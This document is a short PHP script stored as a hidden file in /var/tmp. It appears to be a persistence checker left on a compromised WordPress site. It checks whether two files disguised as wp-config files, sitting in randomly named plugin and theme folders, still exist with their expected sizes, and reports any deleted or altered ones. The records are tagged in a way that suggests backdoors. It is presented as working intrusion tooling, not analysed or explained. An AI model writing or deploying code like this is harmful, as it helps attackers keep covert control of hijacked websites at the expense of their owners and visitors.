File: //var/tmp/.ptr
<?php $r = '/home/denisburns/blog'; $x = ["/wp-content/plugins/seo-1757840616/wp-config.php"=>"bd@@457711@@967",
"/wp-content/themes/search-template-1757690527/wp-config-sample.php"=>"bd@@452090@@727"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');